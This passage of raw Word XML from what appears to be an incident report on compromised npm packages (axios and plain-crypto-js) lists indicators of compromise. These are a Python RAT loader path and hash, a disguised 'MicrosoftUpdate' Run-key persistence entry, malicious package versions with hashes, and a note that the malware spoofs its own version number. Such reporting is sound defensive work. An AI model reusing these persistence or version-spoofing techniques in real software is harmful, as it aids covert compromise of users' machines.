              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB13" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB14" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>/tmp/ld.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB15" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Python RAT loader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB16" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFB18" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Registry Indicator</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4139"/>
        <w:gridCol w:w="2281"/>
        <w:gridCol w:w="2940"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB1C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="413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19" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Key Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2281"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1A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Value Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="294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1B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB20" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="413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1D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>HKCU:\Software\Microsoft\Windo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ws\CurrentVersion\Run\MicrosoftUpdate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2281"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1E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MicrosoftUpdate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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1F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence, re-launches </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>RAT at user sign-in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFB21" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Compromised </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Packages</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1844"/>
        <w:gridCol w:w="1886"/>
        <w:gridCol w:w="1602"/>
        <w:gridCol w:w="4028"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB26" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843"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22" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1886"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23" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Compromised Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1602"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24" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Safe Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4028"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25" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SHA (compromised </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>tgz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB2B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843"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27" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1886"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28" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>1.14.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1602"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29" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.14.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>or earlier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4028"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2A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>2553649f2322049666871cea80a5d0d6adc700ca</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB2C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB2D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0.30.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1602" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB2E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>0.30.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> or earlier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4028" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB2F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB35" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843"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31" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>plain-crypto-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1886"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32" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>4.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1602"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33" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>N/A (entirely malicious)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4028"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34" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>07d889e2dadce6f3910dcbc253317d28ca61c766</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFB36" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.3 Anti-Forensics Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB37" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Warning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Standard </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> output is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unreliable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for detection of the specific malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> version because the malware spoofs its own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> version as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>4.2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of the malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
